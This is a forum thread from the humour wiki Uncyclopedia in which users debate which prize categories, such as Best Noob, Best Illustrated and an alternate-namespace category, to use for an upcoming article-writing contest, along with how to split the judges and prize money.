A pipeline is a document processing unit. A pipeline consists of one or more modules. Basically, the pipeline is a workflow blueprint of how your modules should handle documents. One might find a slight analogy with a controller in .NET MVC; nevertheless, it's good to think about pipelines in a more declarative way. You just specify what your output should be rather than how to transform and produce it.
Pipelines have their own lifecycle process defined by phases. When pipelines and modules are executed, the current state is passed in the execution context.
Gimme code!
In this section, we’ll create a new static site powered by Statiq from scratch. The site will contain one root page, a listing of the articles, and article detail pages. The example will showcase rendering using Razor pages as well as Handlebars templates. Then we’ll use a third party module for fetching and rendering content from the headless CMS Kontent. In the end, we’ll publish our site to Netlify, with preview functionality.
Note: If you just want to see working code published on Netlify, you can fork my repository and start from Step 7.
Prerequisites
Installing the .NET Core SDK is the only prerequisite. This tutorial assumes you are familiar with the basics of frontmatter, markdown formatting, and the .NET ecosystem.
Step 1: Create a new project
- Run dotnet new console --name StatiqTutorial from the command line.
- Navigate to your newly created StatiqTutorial directory and run dotnet add package Statiq.Web --version 1.0.0-beta.14 (you can find the latest version of the framework on Nuget).
Create a bootstrapper in your Program.cs.
using Statiq.App; using Statiq.Web; namespace StatiqTutorial { public class Program { public static async Task<int> Main(string[] args) => await Bootstrapper .Factory .CreateWeb(args) .RunAsync(); } }
In your project, create an input folder with an index.md file with the following content. The input directory is the default path where Statiq looks for input files.
Run dotnet run. This command will create an output folder with the generated page.
By running dotnet run -- preview, Statiq will generate the output content (same as in the previous step). In addition, it'll start your server and serve content from the output directory.
You should see your rendered site at the local preview URL.
What just happened?
All the magic happened in the
CreateWeb(args) method that created a bootstrapper with Statiq functionality. Default configuration runs your app with several modules. The most important one is default processing of your input markdown files and generating a page with the same name with content in HTML.
Step 2: Create an index page with a custom Razor template
Go to Program.cs and replace it with the code below. With this bootstrapper setup, you tell Statiq you don't want all the default magic and you'd rather take care of the content rendering on your own. However, AddHostingCommands() still provides you with preview functionality.
using System.Threading.Tasks; using Statiq.App; using Statiq.Web; namespace StatiqTutorial { public class Program { public static async Task<int> Main(string[] args) => await Bootstrapper .Factory .CreateDefault(args) .AddHostingCommands() .RunAsync(); } }
In the input folder, remove index.md and create a content directory. In this directory, we'll have our input files for content. In input/content, create a new home.md file with the following code.
--- Title: Hello World from Statiq! Content: This is a root page of the statically generated site powered by Statiq. This page is rendered by Razor view template. Statiq Web is a powerful static website generation toolkit suitable for most use cases. It's built on top of Statiq Framework, so you can always extend or customize it beyond those base capabilities as well. This is an example of how to render one single page. ---
This will be your local content data source file for your home page. It's basic frontmatter markdown content with the Title and Content properties.
- In the input directory, create a Home.cshtml file with content.
- Create HomeViewModel.cs.
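The original file contents aren't shown here, but a minimal HomeViewModel matching the frontmatter fields could look like this (property names are an assumption based on home.md):

```csharp
namespace StatiqTutorial
{
    public class HomeViewModel
    {
        public string Title { get; set; }
        public string Content { get; set; }
    }
}
```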
- When you check Home.cshtml, you'll find out that your HomeViewModel is not visible from this view. To fix it, create a new _ViewImports.cshtml in the input directory.
- Now we need to tell Statiq how we want to process and handle our input file. Create a HomePipeline.cs file. In the Input phase, this pipeline reads our content/home.md file. The Process phase uses the ExtractFrontMatter and ParseYaml modules that get content from this file. We need to somehow connect our input document with our view. We achieve this by using the MergeContent module together with the RenderRazor module, where we specify how to create an appropriate view model. The SetDestination module determines where your files will be written. In the last Output phase, we use the WriteFiles module for writing our output files.
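A sketch of what such a pipeline can look like, wired from the modules named above (the exact overloads, the WithModel helper, and the view-model mapping are assumptions; check the Statiq documentation for your version):

```csharp
using Statiq.Common;
using Statiq.Core;
using Statiq.Razor;

namespace StatiqTutorial
{
    public class HomePipeline : Pipeline
    {
        public HomePipeline()
        {
            InputModules = new ModuleList
            {
                // Input phase: read the markdown content file
                new ReadFiles("content/home.md")
            };
            ProcessModules = new ModuleList
            {
                // Pull Title/Content out of the YAML front matter
                new ExtractFrontMatter(new ParseYaml()),
                // Merge the document with the Razor view
                new MergeContent(new ReadFiles("Home.cshtml")),
                // Render Razor, building the view model from document metadata
                new RenderRazor()
                    .WithModel(Config.FromDocument(doc => (object)new HomeViewModel
                    {
                        Title = doc.GetString("Title"),
                        Content = doc.GetString("Content")
                    })),
                new SetDestination(".html")
            };
            OutputModules = new ModuleList
            {
                // Output phase: write the generated files to the output folder
                new WriteFiles()
            };
        }
    }
}
```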
- Run dotnet run -- preview. You should see your markdown content rendered on the Razor page, similar to the one deployed on Netlify.
Step 3: Create a listing page with a Razor template
- In input/content/features, copy the following markdown files. These will be our content data source for the listing page. You can find the content and structure for these files on GitHub.
- In the input folder, create FeaturesListing.cshtml.
- Create Feature.cs, FeaturesListingViewModel.cs, and FeaturesListingRazorPipeline.cs. It's worth mentioning that in the Process phase we are using the execution context of the current pipeline, where we are adding content from our markdown files as children of the document. In the Output phase, we are iterating through the document's children and creating a List<Feature> features object, which is used by FeaturesListingViewModel. Other principles are similar to those described in Step 2.
- After running dotnet run -- preview you should see your features listing.
- If you'd like to use the Handlebars template instead, you can find the pipeline and template on GitHub. The principles are the same.
Step 4: Create a detail page with default markdown rendering
- Create FeatureDetailPipeline.cs. In the Process phase, this pipeline uses the RenderMarkdown module, which renders markdown.
- Run dotnet run -- preview. Now your links from both (Razor and Handlebars) listing pages leading to the detail page should work.
Step 5: Prepare content in the headless CMS Kontent
When you want to enable content authors to create and manage content, it’s more convenient to provide them with the capabilities of Headless CMS than to edit your codebase directly. In this step, we’ll create a project in headless CMS Kontent. Moreover, we’ll create a new home page, which will use content from this CMS.
- Go to kontent.ai and create a new project.
Go to Content Types and create a new Home content type. Add Title and Content text elements. Save changes.
Go to the Content & Assets section and create a new content item Hello World from Statiq! based on Home content type. Fill in Title and Content elements. Publish the content item.
In the Settings section, you will find your ProjectId and Preview API keys. You will need them in the next step.
Step 6: Integrate content from the CMS into our Statiq site
First, we’ll generate strongly typed classes for our content types. This helps us to work with content from the headless CMS in a safe, strongly typed way. Then we’ll use the Kontent.Statiq module to fetch and use our content in the new pipeline.
- Install Kentico Kontent Generator utility.
- In the root of your project, create a PowerShell script file named GenerateModels.ps1.
- For the local configuration, create appsettings.json in the root of your project. Replace projectId with the one from the previous step.
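At this point the file only needs the Kontent delivery options, the same shape the post shows later with the preview keys added:

```json
{
  "DeliveryOptions": {
    "ProjectId": "YOUR_PROJECT_ID"
  }
}
```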
- When you run this script, it generates strongly typed models together with ITypeProvider in the Models folder.
- Add Kontent.Statiq module to your project.
- Register CustomTypeProvider and DeliveryClient in the bootstrapper.
- Create a HomeFromCmsPipeline.cs file. This pipeline uses the Kontent.Statiq module in the Input phase. In the Process phase, we are reusing the Home.cshtml Razor view. All the magic happens in the Process phase: we are creating a HomeViewModel using the new constructor we already added. The parameter of the constructor is Statiq's document created with content from the headless CMS.
- Run dotnet run -- preview. At the local preview URL you should see your rendered content from the headless CMS.
Pro tip: You can also check how your site looks and behaves with unpublished content. Just enable preview mode in appsettings.json and use the Preview API key from the previous step.
{ "DeliveryOptions": { "ProjectId": "YOUR_PROJECT_ID", "PreviewApiKey": "YOUR_API_KEY", "UsePreviewApi": true } }
Step 7: Let’s publish it on Netlify
We will create two sites on Netlify. While one will build our production site with published content, the other one will use unpublished preview content. Netlify's build machines have the .NET 5 framework installed by default. Make sure that in your project's .csproj file you are targeting net5.0 as the target framework.
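That is, the project file's property group should contain something like this (a minimal illustrative fragment):

```xml
<PropertyGroup>
  <OutputType>Exe</OutputType>
  <TargetFramework>net5.0</TargetFramework>
</PropertyGroup>
```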
- Push the whole project to your GitHub repository. Do not include appsettings.json; we will provide these settings in the form of environment variables. If you don't want to follow all the previous steps, you can fork my repository and start from here.
- Go to Netlify and create a new site from Git, select your repository.
Fill in dotnet run as the Build command and output as the Publish directory. Add a new DeliveryOptions__ProjectId variable and enter your projectId. Note: Netlify uses a double underscore (__) as the delimiter for nested environment variables.
Click Deploy site. Your site will be ready within minutes.
Step 8: Unpublished preview content on Netlify
- For previewing unpublished content, create a new site following steps from Step 7. In addition, you will have to provide a PreviewApiKey and UsePreviewApi flag.
Besides DeliveryOptions__ProjectId, add two new environment variables: DeliveryOptions__PreviewApiKey with your Preview API Key value and DeliveryOptions__UsePreviewApi with the value true.
Click Deploy site. Your preview site will be ready within minutes.
Pro tip: Add webhooks for rebuilding your site when content is changed. You can learn more about Kontent webhooks and Netlify build in this article.
Wrap-up, next steps, and resources
This tutorial is meant to be an introduction to the Statiq static site generator. There are opportunities for you to make additions to the code around styling, SEO, and even adding JavaScript for more capabilities. If you would like to use a more complete template, I'd recommend the Statiq Lumen starter, which is a blog site built with Statiq and Kentico Kontent that uses SEO best practices and has a great Lighthouse score. Another resource on connecting Statiq with the CMS is Jamstack on .NET: From zero to hero with Statiq and Kontent.
About the author
Martin Makarsky is a developer advocate and hacker at Kentico. During the day he tries to find ways to help people with code. At nights, he’s hacking at first glance incompatible pieces into meaningful structures. He writes at
About Kentico Kontent
Kontent is a cloud-native headless CMS that lets you build websites and applications fast. Integrate Kontent directly into your Netlify site for faster deployments and unrestricted design possibilities. Reach out about using Kontent with your next production Netlify project. | https://www.netlify.com/blog/2021/01/22/why-should-.net-developers-be-interested-in-jamstack/ | CC-MAIN-2021-10 | refinedweb | 2,384 | 59.8 |
Yesterday I got a review copy of Automate the Boring Stuff with Python. It explains, among other things, how to manipulate PDFs from Python. This morning I needed to rotate some pages in a PDF, so I decided to try out the method in the book.
The sample code uses PyPDF2. I’m using Conda for my Python environment, and PyPDF2 isn’t directly available for Conda. I searched Binstar with
binstar search -t conda pypdf2
The first hit was from JimInCO, so I installed PyPDF2 with
conda install -c pypdf2
I scanned a few pages from a book to PDF, turning the book around every other page, so half the pages in the PDF were upside down. I needed a script to rotate the even numbered pages. The script counts pages from 0, so it rotates the odd numbered pages from its perspective.
import PyPDF2

pdf_in = open('original.pdf', 'rb')
pdf_reader = PyPDF2.PdfFileReader(pdf_in)
pdf_writer = PyPDF2.PdfFileWriter()

for pagenum in range(pdf_reader.numPages):
    page = pdf_reader.getPage(pagenum)
    if pagenum % 2:
        page.rotateClockwise(180)
    pdf_writer.addPage(page)

pdf_out = open('rotated.pdf', 'wb')
pdf_writer.write(pdf_out)
pdf_out.close()
pdf_in.close()
It worked as advertised on the first try.
One thought on “Rotating PDF pages with Python”
For comparison, the Perl version: | https://www.johndcook.com/blog/2015/05/01/rotating-pdf-pages-with-python/ | CC-MAIN-2017-22 | refinedweb | 210 | 69.28 |
[Solved] QML WebView Error: Cannot assign to non-existent property "onLoadFinished"
In order to try out the latest Qt Quick Controls that came with Qt 5.1, I started making a barebones browser. Here is the code snippet that shows WebView in action:
@
import QtWebKit 3.0
import QtQuick 2.0
import QtQuick.Controls 1.0
import QtQuick.Layouts 1.0
WebView {
    id: browser
    Layout.fillHeight: true
    Layout.fillWidth: true
    url: "http://www.google.com"
    onLoadStarted: { loadingStatus.text = "Loading url.text" }
    onLoadFinished: { loadingStatus.text = "Loading done." }
}
@
Executing this gives me an error:
@ Cannot assign to non-existent property "onLoadFinished" @
What am I missing here?
P.S.: I am using import QtWebKit 3.0 here. Is that a concern?
Ok. Later on, I discovered that QtWebKit 3.0's WebView indeed doesn't have an "onLoadFinished" property. It, along with onLoadStarted, has been replaced by the onLoadingChanged property.
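With QtWebKit 3.0 the equivalent handler looks roughly like this (the status-enum names follow the QtWebKit 3.0 WebView API; treat it as a sketch):

```qml
WebView {
    id: browser
    url: "http://www.google.com"
    onLoadingChanged: {
        if (loadRequest.status === WebView.LoadStartedStatus)
            loadingStatus.text = "Loading " + url
        else if (loadRequest.status === WebView.LoadSucceededStatus)
            loadingStatus.text = "Loading done."
        else if (loadRequest.status === WebView.LoadFailedStatus)
            loadingStatus.text = "Loading failed: " + loadRequest.errorString
    }
}
```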
However, Qt Creator coughs a supposed syntax error when using that, as apparent by "this post of mine.":
Hence, this whole confusion arose.
Anyway, I am marking this thread as solved. | https://forum.qt.io/topic/30028/solved-qml-webview-error-cannot-assign-to-non-existent-property-onloadfinished/2 | CC-MAIN-2021-49 | refinedweb | 179 | 55.2 |
"Drunkenness does not create vice; it merely brings it into view" ~Seneca
So Jelly Bean 4.2 landed with much fanfare and tucked in amongst the neat new OS and SDK features (hello, multi-user tablets!) was this little gem for testers: UiAutomator.jar. I have it on good authority that it snuck in amongst the updates in the preview tools and OS updates sometime around 4.1 with r3 of the platform. As a code-monkey of a tester, I was intrigued. One of the best ways Google can support developers struggling with platform fragmentation is to make their OS more testable so I hold high hopes with every release to see effort spent in that area. I have spent a couple days testing out the new UiAutomator API and the best way I can think of describing it is that Android's JUnit and MonkeyRunner got drunk and had a code baby. Let me explain what I mean before that phrase sinks down into "mental image" territory.
JUnit, for all its power and access to every interface, every service, every nook and cranny in your app, is limited to only running within your app's context. It carries the full heft of all the years of *Unit development elsewhere in test automation but it remains too close to its unit test roots to be serviceably fast and agile to develop in for UI automation. Moreover the limitation of only being able to test the associated product app prevents testers from fully exploring the interactions between applications and systems elsewhere on the device.
Conversely Android's MonkeyRunner is based in a Java adaptation of Python (Jython, no kidding) and it has access to a whole host of interfaces outside of the particular application you're trying to test. It can be used for mobile web testing, capturing screenshots of any app interaction, and since it is based in Python, is fairly quick to script. Its shortcomings are pretty severe when it comes to deep integration with application architecture so you are left clicking sometimes blindly in order to generate events (sendkeys, x/y coordinates, d-pad actions, oh my!).
It is easy to see where these two tools could complement each other well if combined. Deep application integration with simpler scripting and full-device access, not just sandboxed inside a single app's context could be really powerful. I say "could be" for a reason though and that's after a few days' mucking around with the tool. Let's go over the good aspects first.
The Good:
- Since UIAutomator still uses JUnit as the basis for its test runner, most of the familiar test case structures are available in all the best ways.
- Of special importance are UiWatchers which are like async police whom you can configure to lurk outside of test cases to catch common difficulties affecting tests (such as dialogs and alerts) or embedded within tests themselves for more specific triggers.
- The XML hierarchy dump tool in Monitor/DDMS is amazingly fast by comparison to the old Hierarchy Viewer, and gets you everything you need as a tester to identify the specific UI elements your test will need without the distractions. Brilliant.
- The tests compile as a separate JAR which you push to the device/emulator in shared filespace so that the application-under-test-sandboxing of former JUnit test projects will be a thing of the past. Even better, the JAR still executes on the device allowing for massive parallelization just like before (sure, I am tempted to brag about having a parallelization problem but I'll take the high road this time)
- Simple, repeatable syntax for getting objects from the UI to interact with means you spend less time coding and more time constructing useful tests (at least, that's the hope, when it works)
- Use of Accessibility labels enforces good coding practices. Just like iOS's UI Automation, this tool takes advantage of some oft-overlooked aspects of complete code and so testers get convenient UI hooks, and the sight-impaired get better apps. Win, meet my friend Win. You two have lots to talk about.
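To give a flavor of the API described above, here's a minimal test case sketch (written against the Android 4.2-era com.android.uiautomator classes; the target app and package names are illustrative):

```java
import com.android.uiautomator.core.UiObject;
import com.android.uiautomator.core.UiObjectNotFoundException;
import com.android.uiautomator.core.UiSelector;
import com.android.uiautomator.testrunner.UiAutomatorTestCase;

public class LauncherTest extends UiAutomatorTestCase {

    public void testOpenSettings() throws UiObjectNotFoundException {
        // Start from the home screen.
        getUiDevice().pressHome();

        // Find a launcher entry by its (accessibility) text.
        UiObject settings = new UiObject(new UiSelector().text("Settings"));
        assertTrue("Settings shortcut not found", settings.exists());

        // Tap it and wait for the new window, crossing the app sandbox freely.
        settings.clickAndWaitForNewWindow();
    }
}
```

Note how the repeatable UiSelector chaining keeps element lookup terse compared to hand-rolled instrumentation code.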
The Bad:
- Just like the former JUnit, this one lacks portable XML test results output, which makes it feel like Google just don't care about good, thorough reporting.
- Furthermore, on the reporting side of life, the lack of XML output is compounded by the lack of Eclipse integration for running the tests. You will spend a lot of time with the command line. As you're aware from my previous posts, we've built an extensive CI system and hooked it up to a device lab which is accessible even from within Eclipse. This tool is not there yet.
- JUnit's overly verbose coding style is still present meaning writing tests is still complex and you need to know a lot about device limitations, timing of events in the UI, and other kinds of non-trivial, deeper than scripting, test automation heavy lifting. I would say this is still a 4 out of 5 in terms of code complexity. Maybe a 3 if your app plays nicely. I would say my UIAutomator test cases are likely to contain 80% to 120% as many lines of code as my straight up JUnit-based UI test cases. No real gains here (yet).
- This tool only works on devices and emulators graced with Android 4.1 (or higher). This is because the tests are run via an app included with the OS on the device. Over the next few years this will allow you to begin getting wider device coverage with tests written using this tool but until then you can't use the UIAutomator for compatibility tests. Fragmentation's a mean ol' dog who won't be put down easily.
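For reference, the command-line loop I keep alluding to looks roughly like this (the JAR and class names are illustrative; the JAR is built with the SDK's uiautomator build files):

```
adb push bin/LauncherTest.jar /data/local/tmp/
adb shell uiautomator runtest LauncherTest.jar -c com.example.LauncherTest
```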
So what are we left with when we add this all up? I'd say while UIAutomator won't revolutionize the way I write UI test automation overnight, it shows tremendous promise. When this little code baby matures over the next year or two, with some more support from the Open Source community, I can see this going way beyond tools like Robotium. For those of you who are very comfortable in Java and JUnit, this will get you writing UI Automation faster than Robotium did, and with its ability to break out of the sandbox, you'll be getting more creative with what you're willing to test.
What's the TL:DR?
Why you want to use this: no more app sandbox for JUnit-based tests, better coding practices, more automatable scenarios with deeper device integration.
Why you'll want to pull your hair out: still no native XML output, no Eclipse integration, still too verbose to be clean and fast, and it only works on devices/emulators running Jelly Bean 4.1 and above.
Final Words
Writing comprehensive automation for UI tests on devices is still really hard. There is huge support in the Android community for brave testers who like a challenge and Google have provided us another option. If Android's JUnit and MonkeyRunner's drunken tryst resulted in all this already, I say we all buy Google's Android test developers another round.
Thanks for the review Russell! It sounds like, for the time being anyway this tool's biggest weakness is that it only runs on 4.2. One of the biggest wins for automation (especially on Android) is crossing multiple configs, this tool isn't the one for that. Like you said, maybe after the baby grows up a bit.
Hi Brian. Thanks for the comment. I've corrected my post to state that it is supported on devices running 4.1 and forward but even with that, Jelly Bean is less than 5% of total Android marketshare. One of the huge advantages to this tool however is its ability to test anything the device can do. I imagine if you've got a 4.1 phone or tablet, you can even test other people's apps without access to their source code like you'd need with regular JUnit.
Great tool..It is nice to see here about UIautomater.
Could you tell me whether this UIautomater can supports for android web views like HypbridApps ?
I posted some similar findings here:
I don't think the verbosity is wholly a by-product of being JUnit -- for example, libraries like Mockito manage to keep test code shorter by having nice methods you can statically import and using plenty of method chaining. That's missing in UI Automator.
As for the lack of JUnit XML support, I've already asked on the adt-dev mailing list about adding support to the excellent "android-junit-report" project, but with little luck so far:
The big win over Robotium is that it supports crossing package boundaries. Robotium can only test the Activities that live in the package under test. UI Automator works across the whole system.
The biggest downside for me is that it's tied so closely to the system, therefore updates and bug fixes seem likely to be released infrequently, i.e. once per Android OS update.
Is it possible to modify the android-junit-project ourselves...instead of waiting for Google to support it?
Thanks for the comments, Christopher.
The verbosity is a Java thing. With projects like Cucumber and other Ruby-style BDD test semantics libraries out there, I would hope that future updates to tools designed to make automating the UI easier would try and move that direction. Sure, you can port Cucumber to Java but without native support for that level of semantics, you're just asking people to add an unnecessarily ungainly semantic translation layer themselves and that gets hard to support quickly.
Which ties back to your other concerns about XML and just support in general. I think the pace of development on the platform itself is already so fast that these kinds of efforts are all measured against how much of a return they'd provide. It just seems like Google aren't convinced doing so within the Android project is worth their effort, especially with the open source community doing their best already to fill in the gaps.
We use Robotium already and get our JUnit XML output from Polidea's XML test runner JAR. A quick build-time android:uses-permission insertion in the Manifest to add SDcard access to debug builds gives us a place on disk to write test results for easy retrieval. We'd probably just use "adb run-as" for most purposes but Robotium's screenshot tool points to a non /data/data/your.package.name directory so I kill two birds with one stone and pipe all file output there and pull a single directory back to the CI system. I have a few posts about it elsewhere in the blog.
As for crossing package boundaries, I completely agree. This is an incredibly powerful tool for scenarios that require whole-device manipulation (so long as that doesn't involve needing access inside WebViews apparently). I look forward to expanding my test automation support coverage accordingly.
Thank you for your great writeup! My first impression is that it's a lot quicker to write testcases using this framework, as compared to Robotium. The webview limitation is as expected, but you probably can still inject javascript like with Robotium.
But, I could not get the UiWatcher to work, it does not ever seem to be called even when the UiSelector does not match anything. Do you per chance have a sample you want to share?
Thanks for the comment, jmk.
I just wrote up a quick demo test JAR to walk through the use of Watchers. I'll post it and an article about using them tomorrow. Stay tuned!
Hey Russell, great write up, pretty useful.
Thanks...cheers!
Hi Russell,
I am facing method not found error while running uiautomator test cases on my device.
I get the following error result on my command prompt while running the test cases.
"Error in testDemo2:
java.lang.NoSuchMethodError: com.android.uiautomator.core.UiSelector.textMatches
at mh_test.MainClass.testDemo2(MainClass.java:61)
at java.lang.reflect.Method.invokeNative(Native Method)
at com.android.uiautomator.testrunner.UiAutomatorTestRunner.start(UiAutomatorTestRunner.java:121)
at com.android.uiautomator.testrunner.UiAutomatorTestRunner.run(UiAutomatorTestRunner.java:82)
at com.android.commands.uiautomator.RunTestCommand.run(RunTestCommand.java:76)
at com.android.commands.uiautomator.Launcher.main(Launcher.java:83)
at com.android.commands.uiautomator.Launcher.main(Launcher.java:83)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:237)
at dalvik.system.NativeStart.main(Native Method)
INSTRUMENTATION_STATUS: numtests=2
FAILURES!!!
Tests run: 2, Failures: 0, Errors: 1
I have googled around, and in Google forums I found that such errors occur while running test cases on an emulator, but I am doing it on a device, so please help me figure out how to get rid of this error. An early reply would be much appreciated because I badly need the solution.
I would also like to post my code as-
package mh_test;
import com.android.uiautomator.core.*;
import com.android.uiautomator.testrunner.UiAutomatorTestCase;
public class MainClass extends UiAutomatorTestCase {
public void testDemo2() throws UiObjectNotFoundException {
// Set the swiping mode to horizontal (the default is vertical)
// appViews.setAsHorizontalList();
UiObject eulaobject = new UiObject(new UiSelector()
.className("android.widget.CheckBox"));
eulaobject.click();
// Validate that the package name is the expected one
UiObject eulaValidation = new UiObject(new UiSelector().textMatches("I agree to the Terms and Conditions"));
assertTrue("Eula doesnot match",
eulaValidation.exists());
}
}
Thanks,
Ritima
It depends on your device. Since this is a new tool and it depends on the software deployed to the device in the device OS, you might find that unless you're running 4.2 on your device, you don't have all the updated methods in the tool. This was something I noticed as well and made comment towards in my main post. For now, try running your code in an emulator running rev 17 of the SDK and proving whether or not it works at all under the best case scenario. Once that's established, double-check the OS on your device. If it isn't 4.2, you may need to be satisfied with running your tests on the emulator for now.
Hi Russell
i was able to identify the cause of error, it was because i was using api 16 and some of the functions were not working in api 16.
Thanks for the reply. I would also like to know more about UiWatchers; I read your blog post on watchers and it was pretty good, but if you could describe them in a more verbose manner, with a complex example, that would be great. Thanks :)
Hi Russell
I am facing one more problem while using uiautomator that is- I want to check if there is an active internet connection established on my device before a particular test case is running. I searched around but could not get the desirable results.
Hey
I am unable to press 'Go' button on searching something on Nexus 7' tablet.I tried using following -
//Search something say "fun"
new UiObject(new UiSelector().text("Enter URL or Search & Win")).setText("fun");
getUiDevice().pressEnter();
OR getUiDevice().pressSearch();
Also tried :
getUiDevice().pressKeyCode(66); //for enter
getUiDevice().pressKeyCode(84); // for search
Could you help me out with this?
Hey Russel
Can you please tell which is the first class that is encountered when uiautomator is called. As far as I have understood, We need not write a main Activity class while dealing with the uiautomator for testing.
Russel,
Can you tell me where to find the new changes to uiautomator.
I want to see the new changes that have come to API Level 18 and Level 19(Kitkat)
Thanks
While running the UiAutomator the result is shown on the command prompt with failure and pass trace. Where can I get the complete report, Is there any possibility to generate any XML report using Uiautomator?
This is common to all of Google's provided test tools. Internally, Google uses a custom test tracking tool and thus uses custom parsing rules to suit their needs. The rest of us who appreciate basic things like generic XML reporting are left to look for things like the Polidea XML Test Runner for JUnit (e.g. Robotium) tests. In the case of the UiAutomator's output, I found this to be quite useful:
I hope that helps.
Thanks Russell...As of Today...Do you still use UIAutomator?...Or is there a better tool that you prefer?
Suuuuuuper late reply. I still use UiAutomator. I've got an upcoming blog post comparing it with Espresso that you might enjoy.
Not 4.1 and above, just 4.1. Each scrollForward method and methods like it keep returning false for if they are able to scroll again. This breaks scrollIntoView and you can kiss goodbye to any testing on small devices or anything that scrolls!
Swipe is also broken in the same way on android 4.3!
I am not new to programming but I am new to C++. I have followed the directions of other sites of how to pass a two-dimensional array to a function. I am getting a confusing error. Please note that I have been working on this issue for two evenings. I tried to solve the problem myself before posting. I am also aware of the syntax of passing an array with the width defined. I am wanting to write a general use function and I don't want to be locked into any specific size.
Thank you in advance.
Here is my code:
#include <iostream>
using namespace std;
void initialize2DCharArray(char** array, int height, int width, char initChar);
void initialize2DCharArray(char** array, int height, int width, char initChar)
{
for(int colCount=0;colCount < height; colCount++)
{
for(int rowCount=0;rowCount < width; rowCount++)
{
array[rowCount][colCount] = initChar;
}
}
}
void main()
{
char c[3][3];
initialize2DCharArray(c, 3, 3, 'A');
}
Here is the error:
error C2664: 'initialize2DCharArray' : cannot convert parameter 1 from 'char [3][3]' to 'char **'
Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast | http://forums.devx.com/printthread.php?t=171793&pp=15&page=1 | CC-MAIN-2014-52 | refinedweb | 189 | 60.65 |
From: Matthias Schabel (boost_at_[hidden])
Date: 2007-03-28 18:42:43
Michael,
Thanks for your positive review. I'm glad that the library is working
for you in a practical setting - that's always a concern for us
academics divorced from the real world ;^)
> specialization is simply the reciprocal of the first. Steven posted a
> solution to this in a separate thread just now and I hope that it will
> get included in the final version.
This should not be a problem; I'm accumulating a list of changes to
be made as they come in.
> Example 16 looks strangely familiar! Glad to see it was interesting
> enough to make the examples.
Your example was actually the impetus driving the decision to
implement heterogeneous units, a project that I know Steven spent a
significant amount of time and effort to get right...
> sure if this unit makes sense in the nautical namespace. One might
> ask "Why not boost::aerial?" The only reason I bring this up is
> because they are used for marine and aerial navigation. There may be
I tend to try to name things so they sound right if you read them;
even though they are used in aerial navigation, as far as I
understand they are still called nautical miles, so to my eye
nautical::miles reads right.
> other such examples, but I think all of the non_si_units.hpp units
> could reside in a boost::non_SI namespace with little confusion to the
> user. These would be all non-SI, but accepted, units (see
>).
This is probably one of the darker corners left in the library; I'm
hoping that reviewer input will help to shape the final form of the
non-SI portion of the library. Steven has some ideas for dealing with
the irregularities of US/Imperial units in a relatively clean and
elegant way. However, putting all of these into the same namespace is
problematic because there are, for example, differing definitions of
units having the same name (mile, in particular) so us_customary,
us_survey, and nautical miles are all slightly discrepant.
> I also noticed that the unit knots was not defined in
> non_si_units.hpp. Is this an oversight? Why are some accepted non-SI
> units defined and others not?
I just have very limited personal experience with and use for these
traditional units, so I didn't think to add it. I'm certainly happy
to put knots in. I don't believe they were listed in the NIST
documents I was referencing. Because there are so many irregular
units out there, I'm reluctant to promise to support everything under
the sun in the library, but the decision of where to stop is a bit
arbitrary. I just used the NIST document as my yardstick (sorry...)
> Is there an exhaustive list in the docs mentioning all units and
> their systems?
There is not yet, but should be.
> Yes, certainly. I would, however, like to hear Matthias' and Steven's
> thoughts on how easy it would be to add a run-time layer on top of
> their existing work.
A runtime component would be essentially a parallel library that
replicated the existing dimensional analysis functionality in runtime
code. I've mentioned previously that it would be relatively easy to
specialize to get a syntax like quantity<arbitrary,Y> that looks much
the same as the existing syntax. It probably wouldn't be hard to
implement runtime algorithms; I am still extremely skeptical that
there are many users out there who would be willing to pay the
computational cost and memory overhead of doing all of the
dimensional analysis at runtime. At a bare minimum, I would like to
see some "real" use cases where it isn't possible to get reasonable
behavior with the existing library. As you mention, the current
implementation works fine with GUIs as long as you're willing to pick
an internal representation for the units used at compile time. There
would also need to be compile-time -> runtime conversions, input
parsing, etc... which would involve varying degrees of effort - the
latter probably will be hardest...
Matthias
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk | https://lists.boost.org/Archives/boost/2007/03/119000.php | CC-MAIN-2020-40 | refinedweb | 710 | 62.38 |
Martijn Wrote:Find some part of the script that says something like this:
PHP Code:
text = unicode(text,encode)
and replace with this.
PHP Code:
text = unicode(text,encode, errors='ignore')
content = unicode(content, encoding)
content = unicode(content, encoding, errors='ignore')
def _unicode(text, encoding="utf-8"):
    try:
        text = unicode(text, encoding)
    except:
        pass
    return text
def _unicode(text, encoding="utf-8"):
    try:
        text = unicode(text, encoding, errors='ignore')
    except:
        pass
    return text
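For context on what `errors='ignore'` does: it silently drops bytes that cannot be decoded instead of raising. The snippets quoted above are Python 2; the same idea in Python 3 (where the `unicode()` builtin no longer exists) uses `bytes.decode`:

```python
# Python 3 equivalent of unicode(text, encoding, errors='ignore'):
# undecodable bytes are dropped instead of raising UnicodeDecodeError.
raw = b"caf\xe9"  # 0xe9 is not valid ASCII

try:
    raw.decode("ascii")           # strict mode raises
except UnicodeDecodeError:
    pass

text = raw.decode("ascii", errors="ignore")
print(text)  # -> 'caf' (the 0xe9 byte is silently dropped)
```

Note that dropped bytes are lost for good, which is usually acceptable for display strings in a skin but not for data you need to round-trip.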
butchabay Wrote:@keibertz
The german translations are not up to date, i've added a lot of stuff under 2.07, so feel free to translate them.
I don't know why there are multiple entries in the db; I had 5 different ones, deleted every one, and scraped my whole collection again. This is what you have to do.
butchabay Wrote:Commited to SVN:
Weather (Not Weather Plus) Widget on Home
butchabay Wrote:Yeah, the weather isn't finished yet, so I'll see to adding more info. I just need a bit of time and patience, as I hate coding all this weather stuff again, and the background panel too...
ialand Wrote:something very strange, over the past 3 ro 4 versions, since Artwork Downloader has started being invoked with the 'Get Artwork' button, the whole machine will just freeze hard, the info screen slid 1/2 way to the right.. freeze hard as in reset button to get loose (this is on a standalone box, XBMC Live, pre-eden). It's persisted thru several pre-eden nightlys, several updates of V2 (on the latest now) and both 1.0 and 1.01 of Artwork Downloader... curiously enough it WILL work fine when you run it from the addon's menu, just freeze up and locks from the Get Artwork button....
any ideas?
butchabay Wrote:Dear Cirrus Extended V2 Users:
I'm thinking of creating a new Home Menu item "Movie Sets", of course with an option to show/hide it and to set a respective background. The submenu entry remains as it is.
The other change I'm thinking of is the Video item: currently it brings you directly to files mode, but I think it should bring you directly to the root.
zactor(3)
CZMQ Manual - CZMQ/4.2.0
Name
zactor - Class for simple actor framework
Synopsis
